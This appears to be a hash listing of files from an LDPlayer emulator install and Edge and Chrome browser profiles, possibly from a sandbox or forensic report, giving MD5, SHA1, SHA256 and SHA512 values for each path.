MD5 4acd5f0e312730f1d8b8805f3699c184
SHA1 67c957e102bf2b2a86c5708257bc32f91c006739
SHA256 72336333d602f1c3506e642e0d0393926c0ec91225bf2e4d216fcebd82bb6cb5
SHA512 9982c1c53cee1b44fd0c3df6806b8cbf6b441d3ed97aeb466dba568adce1144373ce7833d8f44ac3fa58d01d8cdb7e8621b4bb125c4d02092c355444651a4837

F:\LDPlayer\ldmutiplayer\fonts\NotoSans-Regular.otf

MD5 93b877811441a5ae311762a7cb6fb1e1
SHA1 339e033fd4fbb131c2d9b964354c68cd2cf18bd1
SHA256 b3899a2bb84ce5e0d61cc55c49df2d29ba90d301b71a84e8c648416ec96efc8b
SHA512 7f053cec61fbddae0184d858c3ef3e8bf298b4417d25b84ac1fc888c052eca252b24f7abfff7783442a1b80cc9fc2ce777dda323991cc4dc79039f4c17e21df4

F:\LDPlayer\LDPlayer9\ldmutiplayer\ssleay32.dll

MD5 0054560df6c69d2067689433172088ef
SHA1 a30042b77ebd7c704be0e986349030bcdb82857d
SHA256 72553b45a5a7d2b4be026d59ceb3efb389c686636c6da926ffb0ca653494e750
SHA512 418190401b83de32a8ce752f399b00c091afad5e3b21357a53c134cce3b4199e660572ee71e18b5c2f364d3b2509b5365d7b569d6d9da5c79ae78c572c1d0ba0

F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcr120.dll

MD5 50097ec217ce0ebb9b4caa09cd2cd73a
SHA1 8cd3018c4170072464fbcd7cba563df1fc2b884c
SHA256 2a2ff2c61977079205c503e0bcfb96bf7aa4d5c9a0d1b1b62d3a49a9aa988112
SHA512 ac2d02e9bfc2be4c3cb1c2fff41a2dafcb7ce1123998bbf3eb5b4dc6410c308f506451de9564f7f28eb684d8119fb6afe459ab87237df7956f4256892bbab058

F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcp120.dll

MD5 50260b0f19aaa7e37c4082fecef8ff41
SHA1 ce672489b29baa7119881497ed5044b21ad8fe30
SHA256 891603d569fc6f1afed7c7d935b0a3c7363c35a0eb4a76c9e57ef083955bc2c9
SHA512 6f99d39bfe9d4126417ff65571c78c279d75fc9547ee767a594620c0c6f45f4bb42fd0c5173d9bc91a68a0636205a637d5d1c7847bd5f8ce57e120d210b0c57d

F:\LDPlayer\LDPlayer9\ldmutiplayer\msvcp110.dll

MD5 3e29914113ec4b968ba5eb1f6d194a0a
SHA1 557b67e372e85eb39989cb53cffd3ef1adabb9fe
SHA256 c8d5572ca8d7624871188f0acabc3ae60d4c5a4f6782d952b9038de3bc28b39a
SHA512 75078c9eaa5a7ae39408e5db1ce7dbce5a3180d1c644bcb5e481b0810b07cb7d001d68d1b4f462cd5355e98951716f041ef570fcc866d289a68ea19b3f500c43

F:\LDPlayer\LDPlayer9\ldmutiplayer\libssl-1_1.dll

MD5 e8fd6da54f056363b284608c3f6a832e
SHA1 32e88b82fd398568517ab03b33e9765b59c4946d
SHA256 b681fd3c3b3f2d59f6a14be31e761d5929e104be06aa77c883ada9675ca6e9fd
SHA512 4f997deebf308de29a044e4ff2e8540235a41ea319268aa202e41a2be738b8d50f990ecc68f4a737a374f6d5f39ce8855edf0e2bb30ce274f75388e3ddd8c10b

F:\LDPlayer\LDPlayer9\ldmutiplayer\libssh2.dll

MD5 52c43baddd43be63fbfb398722f3b01d
SHA1 be1b1064fdda4dde4b72ef523b8e02c050ccd820
SHA256 8c91023203f3d360c0629ffd20c950061566fb6c780c83eaa52fb26abb6be86f
SHA512 04cc3d8e31bd7444068468dd32ffcc9092881ca4aaea7c92292e5f1b541f877bdec964774562cb7a531c3386220d88b005660a2b5a82957e28350a381bea1b28

F:\LDPlayer\LDPlayer9\ldmutiplayer\libeay32.dll

MD5 ba46e6e1c5861617b4d97de00149b905
SHA1 4affc8aab49c7dc3ceeca81391c4f737d7672b32
SHA256 2eac0a690be435dd72b7a269ee761340099bf444edb4f447fa0030023cbf8e1e
SHA512 bf892b86477d63287f42385c0a944eee6354c7ae557b039516bf8932c7140ca8811b7ae7ac111805773495cf6854586e8a0e75e14dbb24eba56e4683029767b6

F:\LDPlayer\LDPlayer9\ldmutiplayer\libcurl.dll

MD5 2d40f6c6a4f88c8c2685ee25b53ec00d
SHA1 faf96bac1e7665aa07029d8f94e1ac84014a863b
SHA256 1d7037da4222de3d7ca0af6a54b2942d58589c264333ef814cb131d703b5c334
SHA512 4e6d0dc0dc3fb7e57c6d7843074ee7c89c777e9005893e089939eb765d9b6fb12f0e774dc1814f6a34e75d1775e19e62782465731fd5605182e7984d798ba779

F:\LDPlayer\LDPlayer9\ldmutiplayer\libcrypto-1_1.dll

MD5 01c4246df55a5fff93d086bb56110d2b
SHA1 e2939375c4dd7b478913328b88eaa3c91913cfdc
SHA256 c9501469ad2a2745509ab2d0db8b846f2bfb4ec019b98589d311a4bd7ac89889
SHA512 39524d5b8fc7c9d0602bc6733776237522dcca5f51cc6ceebd5a5d2c4cbda904042cee2f611a9c9477cc7e08e8eadd8915bf41c7c78e097b5e50786143e98196

F:\LDPlayer\LDPlayer9\ldmutiplayer\dnresource.rcc

MD5 d4d2fd2ce9c5017b32fc054857227592
SHA1 7ee3b1127c892118cc98fb67b1d8a01748ca52d5
SHA256 c4b7144dd50f68ca531568cafb6bb37bf54c5b078fbac6847afa9c3b34b5f185
SHA512 d2f983dde93099f617dd63b37b8a1039166aaf852819df052a9d82a8407eb299dac22b4ffe8cab48331e695bf01b545eb728bec5d793aeb0045b70ea9ceab918

F:\LDPlayer\LDPlayer9\ldmutiplayer\cximagecrt.dll

MD5 66df6f7b7a98ff750aade522c22d239a
SHA1 f69464fe18ed03de597bb46482ae899f43c94617
SHA256 91e3035a01437b54adda33d424060c57320504e7e6a0c85db2654815ba29c71f
SHA512 48d4513e09edd7f270614258b2750d5e98f0dbce671ba41a524994e96ed3df657fce67545153ca32d2bf7efcb35371cae12c4264df9053e4eb5e6b28014ed20e

F:\LDPlayer\LDPlayer9\ldmutiplayer\7za.exe

MD5 ad9d7cbdb4b19fb65960d69126e3ff68
SHA1 dcdc0e609a4e9d5ff9d96918c30cb79c6602cb3d
SHA256 a6c324f2925b3b3dbd2ad989e8d09c33ecc150496321ae5a1722ab097708f326
SHA512 f0196bee7ad8005a36eea86e31429d2c78e96d57b53ff4a64b3e529a54670fa042322a3c3a21557c96b0b3134bf81f238a9e35124b2d0ce80c61ed548a9791e7

F:\LDPlayer\LDPlayer9\dnmultiplayer.exe

MD5 330013a714c5dc0c561301adcccd8bc8
SHA1 030b1d6ac68e64dec5cbb82a75938c6ce5588466
SHA256 c22a57cd1b0bdba47652f5457c53a975b2e27daa3955f5ef4e3eaee9cf8d127a
SHA512 6afb7e55a09c9aac370dff52755b117ad16b4fc6973665fce266ea3a7934edfb65f821f4f27f01f4059adb0cf54cc3a97d5ff4038dc005f51ecee626fd5fadd1

F:\LDPlayer\LDPlayer9\dnplayer.exe

MD5 2061141f3c490b5b441eff06e816a6c2
SHA1 d24166db06398c6e897ff662730d3d83391fdaaa
SHA256 2f1e555c3cb142b77bd72209637f9d5c068d960cad52100506ace6431d5e4bb0
SHA512 6b6e791d615a644af9e3d8b31a750c4679e18ef094fea8cd1434473af895b67f8c45a7658bfedfa30cc54377b02f7ee8715e11ee376ed7b95ded9d82ddbd3ccc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56067634f68231081c4bd5bdbfcc202f
SHA1 5582776da6ffc75bb0973840fc3d15598bc09eb1
SHA256 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4
SHA512 c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784

C:\Users\Admin\AppData\Roaming\XuanZhi9\ldopengl32x.dll

MD5 b001f88504c8c9973e9a3b4dc03e6d1a
SHA1 a54b3046a70a4f2c792ad6a382b637b599f1dc48
SHA256 8ee4cbed114a588e934b5043f95c9c06f40468c2300fa0d1d938d16c1d46a8fd
SHA512 390e53be657fc35fb2e9f41b76b3b07c161a860d72445a4b1425ca973a6d8c0f32f6de6844719c6e9813e8d949ab65263642dea01c800a00285bd45595bed4d8

F:\LDPlayer\LDPlayer9\vms\leidian0\sdcard.vmdk

MD5 4d592fd525e977bf3d832cdb1482faa0
SHA1 131c31bcff32d11b6eda41c9f1e2e26cc5fbc0ef
SHA256 f90ace0994c8cae3a6a95e8c68ca460e68f1662a78a77a2b38eba13cc8e487b6
SHA512 afa31b31e1d137a559190528998085c52602d79a618d930e8c425001fdfbd2437f732beda3d53f2d0e1fc770187184c3fb407828ac39f00967bf4ae015c6ba77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 81e892ca5c5683efdf9135fe0f2adb15
SHA1 39159b30226d98a465ece1da28dc87088b20ecad
SHA256 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17
SHA512 c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 601767ec26e9e35e03cbf73473cfaf1d
SHA1 309d0d37d3929d2200c696afb3e4d7172c57a28e
SHA256 dd503d58f64bc01e3103fa9dec56afae997076ba8650268372caff7660d1e784
SHA512 b422be7f4a7d898ac7171e2feb99ba1e9c3920186690d2c47681c9a74696bb5b5764b68d2b0637e6e254fc3a09d166d5984df702d4222de3c8dbe5ed9a8ca0c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6a8bb9074cd3a2397f65c2ea2f2fb915
SHA1 6ecd13204b139724d18414ffc263e329af249237
SHA256 c5c8093b26833a89c8ce9384150b7b735f5d295bd1d54db4faa8a6cab0de1497
SHA512 16a78b05e8b59a0ec44bf5269d60093aa73d3ea076d5455f3349d6ec679adba875e1c73bf17358fc71da5021ee735efec3fa3859855058c1ac5e28e653b56c22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c9d661daaa73f6495f512720b756f0f6
SHA1 6f17bc86cc765a2b0dcff3a45b00735b4ece7f33
SHA256 53188099a26693943b5f4fb70927538238ad27c23474e498f16d951a446efe61
SHA512 c517ff0dfff4cbea34f389b8462cf019915db6bf9c8518d32fb471c5cfc129f7e30bd5b7fc766f1cf4f1333e84b50111fc7fa711057f746765d985cf5e5bb42d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 3ee1711b94841de0dbac529fda44439f
SHA1 d33bab647997c392363f659cbe09fc4519710778
SHA256 16020c72e58a90ecc0320f2769c87796acdc514eab971d69317148b0d30e6f64
SHA512 41bb114af40dc2af027f452c0cd32cad566cc5c2ec5f6dd17fc437e8a9437b8203d685351d6250543bd9665ecab23c667d52b20f794f3dc8b9e0b27d3a0621a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f65740405f5fa8987c1894b36e8417a8
SHA1 a3c8785a4b7e8b590bcc2bedba49fe504c008e15
SHA256 54de7d0fb70f1752099b35dd8d57b94487148b8496ad51bc97d4d910fa332ace
SHA512 b96e6728ca60b6e9dced89233292fd6a8c0a3bc02e2516d2596f469892e9b4dd9c32e537b9404ff8c5eceb270fd5bb707cf0bd681cf1af0274ef9fff81db8e7e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 ba95031fb0c5e740a9618616327c6564
SHA1 324e952af62f516622cb647004cc1b691510f7f3
SHA256 a593413c58ec82f077a1947adebc047fc138d656fbf16cc47b368b2c6cea0783
SHA512 a224fcbc970a5fc690075a59a63557b50c316425436bf6c2057c6c2a553e57ff65747a35a79b18a0da544d82ff7528bc11ca3473264dbcd73d0334cfe8c4339d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 9c6343663711d75f08803b7831e2c1d1
SHA1 d53f006e42a793e4d6dbc0fbcad7e9ef99caf476
SHA256 d1bb29fd2b19e56575728c1adfd8fa04052319b63ca9c251c2a5ec28083f8dfb
SHA512 d34f7d7944b8a4424abc7ab247c23ce75422a2de10e28c6797e191df6e7d663ee6c588df52f5d1462c317b721ae68ac2396acb800af1645358e359ad4ec73942

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ae243e18b51c8c6621da6c4531effb4e
SHA1 228b09f7d5b3239b2b683c9e5b92f8443a9aba3d
SHA256 a64b62cf8db63b28b22bdcdb034633c47c5ae9193fdbd2598e21970ae43759d7
SHA512 271fe1ac1967afdb6fbc798cad678d9222831188f80e607ab503510e9ae3254b65d9586358bfa1b3ec83dbd11e551ee9c8398e1d2c24f24bbbbf97f51ab45487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a5a1149047729a493b1a2a65063c39ba
SHA1 8f1f45cb0c0772dcd05795734cbf408636fb9fb9
SHA256 e0ef1f906ea2606c802310437fe799d93e073770ab6549060ee4b9c9c49f2006
SHA512 8ce257a087115e2d542657a2b4679d0c100ebdec76e3392cff1bbba133e129f2fcdbd73f9baab92e762bef47a2572d3dc8553fa3858d787d2a0b2bf8f05dc54e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 24fd66b24d54de942878a2a19a6fee10
SHA1 3af8305572649cae6b782db0246eed3cb3cd63cb
SHA256 a2fd9b67b1dab70cb3a92b443691a8dba06fa7e6f458a09a06c1823df1dd37cf
SHA512 5e2f3f25fdc1c3a4f3ae3cba29024d2883c4331cfef8327ffdc225ad54ba7befdb5ae922329f8368d2fd636a540af6494e1b55c51cfa0924debd216603486ac3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b45ef.TMP

MD5 59f9815eba1235c05418ab479d891e2e
SHA1 2fae56025d23b09dd44de6100b64dbfaf26b732b
SHA256 f26412b7cf21f46fbbf1a1acb5f6e9c37f7bc6d7f586ce933b7b9aea6d853734
SHA512 7c0f26c7b1c48b16e6ae48d42b0f6aabe1663387a23e4f698a099b81745dfd63a46b64eda90cb02b1a90a494768b01e12186e470062d1ee906b2646d784b257e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b710cf65a63d32a578a250b0d6fa0f1f
SHA1 358560b23e801678f45110baa0cd6ce05fd32e54
SHA256 50aa71f72017dc42c2a43fff7e1793cba98ef6005f6e8223e16715a28727f8fd
SHA512 dc2b77a0fd363dacaa83c71868e201157e69271987f417a25c3334548f423cf34b4b380b2d32d4dc41bdd587799370d637cdd426dc427e9c062e18b7482a7f61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 42f399964d76d3c43f9d5653974bb1a5
SHA1 4f5f83264ca15eb298d40061a464ef3f00712fd3
SHA256 4680690df3421797810932890e33cd5565b246c37d28cfb7d3ddc5fc490f8673
SHA512 a7d461a0a24b017c6be039835fdfea8c2b28a47b063dc3f32acb072a225a4c453fdd383681b062dc2562e4fddf31e4c496d71c096bc2d9fab77f7f4b4ac059b9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 13453a19277acb21aa42ba8e469da629
SHA1 0fdf9c5e1eca35807b78959c05b9886951fabb20
SHA256 16db9282e1fb4679009f7b1f4cb6d29ef04f5812532fd1a80605557593aaaabb
SHA512 d95651a6cd1a73d70ef4bb46ba01267c5fd636f879afffe4fe1d00273f3c3a9ae664e15ce287c78dd4b255af71148e4a285836be119236aaaee31c9e88cee41c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a5a1c6662316ca3f5ce4733436dd1825
SHA1 a310e6f5a8176c1da7af49b2fcc5bb5f7371b38f
SHA256 9a9b92bb0e55296d5fea5f546dcbcd3254d383234e3b0ba872555965aa76b4d2
SHA512 4e2345222268c4a433214b96550bd272a8e02ed7ca31c0b91bd759bb6c3550adc305abb583a7237678fe6fa7d5133d1aadc8b6f0f3c65e6eedaaa28c4f626c66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 c3c0eb5e044497577bec91b5970f6d30
SHA1 d833f81cf21f68d43ba64a6c28892945adc317a6
SHA256 eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb
SHA512 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 9e3f75f0eac6a6d237054f7b98301754
SHA1 80a6cb454163c3c11449e3988ad04d6ad6d2b432
SHA256 33a84dec02c65acb6918a1ae82afa05664ee27ad2f07760e8b008636510fd5bf
SHA512 5cea53f27a4fdbd32355235c90ce3d9b39f550a1b070574cbc4ea892e9901ab0acace0f8eeb5814515ca6ff2970bc3cc0559a0c87075ac4bb3251bc8eaee6236

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

MD5 b15016a51bd29539b8dcbb0ce3c70a1b
SHA1 4eab6d31dea4a783aae6cabe29babe070bd6f6f0
SHA256 e72c68736ce86ec9e3785a89f0d547b4993d5a2522a33104eeb7954eff7f488a
SHA512 1c74e4d2895651b9ab86158396bcce27a04acfb5655a32a28c37ee0ebd66cd044c3c895db7e14acc41a93db55463310425c188a7c503f0308ce894cf93df219f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

MD5 74e33b4b54f4d1f3da06ab47c5936a13
SHA1 6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c
SHA256 535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287
SHA512 79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 caf6e9f4d1b4799d1ca695ba186c935e
SHA1 c02c75b4bbd5586ab015ca9168819e281d347cca
SHA256 beb95240a21b12a580e538894380c6ca3892f26ee71b7f9e479bd38482412396
SHA512 f00895af3cbd23cb006a8f0f3c2ebec59b1013a6a562e94a27e409e26a6a3c9315b631d460eb665927a18fff0d0b358945419baf94facb209319bccc997cbb4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2b2ae095a942a2961e18cf80e6b6515e
SHA1 8909fcb5e4cb5320840e6eb07e25e741bdb6012c
SHA256 1ee7bf375354a6b66b687c0e18386fe7eea48315c475f901c9a749b425861589
SHA512 690748971e34acbc4636bd511644123c6220b0311358bc28384f16f79620af2160fdb1d9ca800f7b3d1a6c11ed8664f980662eb2038f926483467977ecfaa477

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 e6ea40afc1045a795ca14ee03a53a4bf
SHA1 d8ef244624361de09ee121108ce4ad2c27129a38
SHA256 d46495052b29bd110b9a0882c4ea8b8478e99b0d49cfb20976a37e2a1d196795
SHA512 18b8ad2c34d38ebedae56e5f927fe01d21a03f414c508b04479162edd915782e17a57a7bd8cf0a36902f2b0c29878bc8ce34f00f1d614eea8a190d2c71395b91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 05be02042122b53fd1a4a30ee28c4875
SHA1 5fef1ec6f2f36b5fb3bd538fb6b88ff2cc842a60
SHA256 9952222e95c2d329668d4ac52c7202d6bfda9ad742f634f6402a6373e720a7b9
SHA512 b1f779d671dd4abd12cd3abf00b3bce030496954098bf604a72824caa3674bbe6836d84ed2314fc450ab89e362fe9cea4ceb2d3cfe3d77e84c788371a14e3c21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b

MD5 a91c8acf084daefe905c538075d9e3ff
SHA1 398a0d67e3e87fb1f01a644a5b9820ab5d5d69b6
SHA256 9901aba2e46fcf181f9b641590df7bba839243151e8747c1e6798703798bf4af
SHA512 2c0aaa2bd478af9cd3424bb483260dfe174f1c02ee1638565c6dfe43f7181e12e0788dfcd19316c6a884dbb02144ffb35fb886caedcf29f8a2c65ba70079fc0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8b0ad54011ad9050906600aa85522dec
SHA1 bb0c80516159623e688683175aaa5d815e68bfc1
SHA256 46d80977902b9cf3346a9b9a40f7c01c8c0a4ef374987c89abe2ddf2d547d452
SHA512 f04231b61a261376a7cc2823ac4830b6d22a3f655fcd49814657beceda02351cb088559df3045eb312b8c1916efe7080dd36ae20923b31cc8e9e7ee0be0ce9a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cfa925299a95b04f6c3e828b67fb7879
SHA1 0b13ee5b865daf8b4265b406e87a6554d0fba66e
SHA256 f2328475d9d187d0c413030d427f31f0dc8d5c04478df952a8752518fa7be97c
SHA512 2be56188636aa01ddb020332cb927d3898911c4f2d2a55a327cc7b956b44663eb17c0d58a17da76405f666919eb5eb49b69c428880dacfe1daeb6759477bd8b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 27ac2fa3c673621889c3166c9246fef8
SHA1 37b6fdb516558aa3ada7c8882e893f580a884cef
SHA256 05a3449e01c86cb2010703bb585bef7b397bb21b24c3888122867cba036b0f65
SHA512 7981c07991938007c0490ee0e7408a522bc8c31efd44e229052f79ca4995e0a5d16e1909c459a8de6fcedeb175aa20cab0a62408fab6eb43cc92657de1c054ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b140595e4b91ef0802688b34fbe187d9
SHA1 c25260e9c7fca150ca00ba4a3e8612a8cf5e1296
SHA256 01098bebb1029aad6930d80fc640f32aee3e2eadb65914a9151040af58440f0e
SHA512 9d7ad792cb99e422bce062154963e8edc8e08a93d009caceaf9f358eabf4bfbee918d51a00314239505d26a61960d023d46d123f2531116ff5f0561cd272fde7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

MD5 620dd00003f691e6bda9ff44e1fc313f
SHA1 aaf106bb2767308c1056dee17ab2e92b9374fb00
SHA256 eea7813cba41e7062794087d5d4c820d7b30b699af3ec37cb545665940725586
SHA512 3e245851bfa901632ea796ddd5c64b86eda217ec5cd0587406f5c28328b5cb98c5d8089d868e409e40560c279332ba85dd8ce1159ae98e8588e35ed61da2f006

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000062

MD5 1b7ac631e480d5308443e58ad1392c3d
SHA1 95f148383063ad9a5dff765373a78ce219d94cd7
SHA256 7fb66071ac6c7cfff583072c47bc255706222c2a4672c75400893f4993c31738
SHA512 15134314dfd36247db86f9b3d4dcb637e162f8fd87c0ce73492ffdb73a87492fc80330655617f165dd969812ed2ebcc42503f632d757bb89ba9116137882119d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 2d78f94bdb85b2621a5f557521d863e5
SHA1 fa2211e6fc8b6d6b93c9e605d761de28fe0bd883
SHA256 9c6d3ecc93395067c86ed1c284b618f73eecac8e3467f4bd55e79288d9793282
SHA512 ced4ab9b53836a11a413fc0d9cb25ee1dc791b430fe54874a0205bcd4aa41b09a6c610d4a25e7d6325cbddfaa1b11a008d1168a6cb16d5683808d29a2960afd7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d6a95b493988346f62f2e5aefdb1caf
SHA1 b7e49fa1aa2bc026ec0680f6afe729f3180a6253
SHA256 486e183bac1dbe38934bbe857332879da557c2c7aa4fff471724d6f15451bfc4
SHA512 26fa436f3f05a7138262a2c5e4e95229dfbefbbb1d3d2384153b1d60c34487a65559e40abb277a4316ecd56e4996010822830398f39d0157b2e97a5e478d7289

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f96527a901d7633344ea6fbe11cf981c
SHA1 d102695aed71e82a962a8c24e2250c8250156ccf
SHA256 f52ddf49f88d36ad0842f0b285d785c22115636ee6536b441c4ecba534bede97
SHA512 480d9a1c068f58af25478529593b67c34934f5e40c51b19da0de4bc631ab74b726f0d7f3d7b901c127348604ac162be6b13059a5d1534918aafcf8a1daf1409f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d

MD5 94bc219ff76d0e943d6787c8a1413a14
SHA1 84110b11d9582071fdc79e2d962746ee7e7092d9
SHA256 06fbb5de26733f8e2269660afb8e4efc0e0e0c5172feefe9cdd229be657e4be2
SHA512 1f6d48f5f3461d4502b2917501053d045732e4bc1cfa870aac090458019d607f982b113838597a5bbb6bcc14d710638c3436f2d33b8cf8c5688252b6d224d725

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000063

MD5 46e6043b3a70e5986f0b72a748d9e3e2
SHA1 5d3ac460401a49fb84286e0f8b9edf6167530fa6
SHA256 171b12a8c0900d5f0d9e700eb668c02f167ad6f7adce4b9c36201ee10aeae005
SHA512 c0f875ed0d9e05a7439ac9d160edf59ed3b1b384b87dca5b75de3ba11a47a94d543f108ee60aaf421c965c0635408003535795e0f6601afdef4010d982724385

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a830ed38bb87848fed4af1393965a5d6
SHA1 7294dae0f56fd5269a30c4648256458e4877e28e
SHA256 7a559d4f9622d27bd2651f5bd2c4cd5754fe317c11e512694aee79f4d4de9ff4
SHA512 abac26ffbade527ca1349dfd1778d8273213763644df4fe82279c58b65e9372686ceb1f50f200dfc1e60af2c297b176a6da971451b7d7330118d3ed65a9fbb1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 640386f3b915c92686289a9854df10a1
SHA1 5dfcde99472f51667abd89261c08d905c597811f
SHA256 62555d5741c3c34d6d016db576058b7d5bd724797ec86b48291db6d14d218870
SHA512 ab59514724a68560efe40cbe538d6ef885799770259c92b1dcff1b7a329b81be6d092131a70ee32630f7469e888114fec0ef9bddfaa46ff850eec34f08ddb3fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 22f345542836b8c950211480f9e45116
SHA1 36faf1f02013f9134438dfc9916a40a7a8b2e392
SHA256 835b689f4c62ac95f44685628ee0e8c155669e982536081742be6c2169060fc4
SHA512 c1a3a3a54cd1e95d83d97aa2dfef3650c53311d6841dfcd965d23a87f70bd6e4be997fef508e300c881873ce7d8924a5472bd38d8fbab941fd4cfab0883f47aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1409bb4a17038b9739b80874a22ccedc
SHA1 89383c048b12b362bf9b819091342e55d4887fa0
SHA256 78d3b62d18c5da9a378cba5e8ce67c9661ffe1866a5e3522b59d0c9b55abf616
SHA512 7f1f983a8c366424346f4b854cb8d23b708d6c181e86bf4ae8bfcae3eaf3301d035f4cfb655f3a9fa3aa32f4cc79cffe1c6bd068d4ff5cdf8daf2fc067c62f31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 ba600d35132c3753eac24caa096709f3
SHA1 2643c6bc3ebe614fd64d901781bb69a862797b7b
SHA256 60af37fd81b71480b0f7ec6fbf390aa9d180d31b7be6a8f5887367be25b56c2c
SHA512 2c28239b7a6c06304a3935420374d6754bef1949a61b9f082d22ecc1cc9703e3d229d725e063752411a0c0e9ada373a90a1700b1f23e90b1ff4a5b7fc58d6d7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056

MD5 3302c3d199cc000492f64e435196cdbc
SHA1 ce1e5fb78e92253c754e8ee34df74feaa45863c5
SHA256 7104d85d83750d42ffa98375b66e70b19895a23aaa0da309a99d1abc3fb7d46c
